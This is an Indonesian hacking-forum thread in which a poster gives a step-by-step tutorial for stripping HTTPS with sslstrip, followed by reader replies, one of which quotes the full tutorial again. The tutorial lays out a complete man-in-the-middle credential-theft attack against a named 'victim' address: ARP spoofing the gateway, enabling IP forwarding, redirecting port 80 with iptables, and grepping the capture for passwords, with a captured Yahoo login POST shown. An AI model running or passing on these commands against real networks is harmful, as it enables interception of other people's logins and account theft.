pwned https(Tutorial)

kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..

langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :

- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5

sekilas mengenai sslstrip :

Code:

root@wh1t3_39ret:~# sslstrip --help

sslstrip 0.1 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.

note :
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.

1.jalankan ssl strip :

Code:

root@wh1t3_39ret:~# sslstrip -a -w laharisi

2.lakukan arpspoof terhadap victim

Code:

root@wh1t3_39ret:~# root@wh1t3_39ret:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5

akftifkan fungsi ip_forward :

Code:

root@wh1t3_39ret:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.redirect port victim ( 80 ) ke port sslstrip (10000)

Code:

root@wh1t3_39ret:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ),

Code:

root@wh1t3_39ret:~# cat laharisi | grep -i "passwd="
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=wh1t3_39ret&passwd=disambunyikan&.save=Sign+In

kita bisa melihat bahwa username = wh1t3_39ret dan password = disembunyikan


maaf kalo ada kesalahan..soalnya masih newbie...

terima kasih...

mantaaapp gan ijin nyimaak :pening:

buat om taslim pasti lagi butuh ini

wew https tembus bro?
keren!

ijin nyimak sambil belajar ...

kurang ngerti yg kek beginian

Mancaps...

terlalu manis OM

sangat indah bro,untuk nikmati

ane ijin sedot dulu,budayakan share

wh1t3_39ret wrote:

kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..

langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :

- ip attacker : 192.168.1.50
- ip victim : 192.168.1.200
- gateway : 192.168.1.5

sekilas mengenai sslstrip :

Code:

root@wh1t3_39ret:~# sslstrip --help

sslstrip 0.1 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.

note :
-opsi -a digunakan untuk logging semua trafic ( http,https)
-opsi -s digunakan untuk logging traficc ssl saja
-opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 )
-opsi : -w : tempat file dump akan disimpan.

1.jalankan ssl strip :

Code:

root@wh1t3_39ret:~# sslstrip -a -w laharisi

2.lakukan arpspoof terhadap victim

Code:

root@wh1t3_39ret:~# root@wh1t3_39ret:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5

akftifkan fungsi ip_forward :

Code:

root@wh1t3_39ret:~# echo 1 > /proc/sys/net/ipv4/ip_forward

3.redirect port victim ( 80 ) ke port sslstrip (10000)

Code:

root@wh1t3_39ret:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000

4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ),

Code:

root@wh1t3_39ret:~# cat laharisi | grep -i "passwd="
url+="?";if(valid_js()){var passwd=form.passwd.value;var challen
function hash2(form){var passwd=form.passwd.value
2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=wh1t3_39ret&passwd=disambunyikan&.save=Sign+In

kita bisa melihat bahwa username = wh1t3_39ret dan password = disembunyikan


maaf kalo ada kesalahan..soalnya masih newbie...

terima kasih...

hhhhhhhhhmmmmmmmmmmm


gk paham w gan,,,,minta pencerahannya dunk agan2 yg sewa ma nih,,,,,,,,,

ijin nyimak smbil blajar oms..

izin coba gan............

pencerahan donk ?????

GX NGERTI OM,,,

mantab wa....

gw kondek bro,tq pinter sekali repu dah buat nt

minta pencerahannya dong om
newbii

Dari comment-commentnya, kayanya berhasil ne cara..
tapi ane masih bingung ini pake terminal OS apa.???
pencerahannya dong om...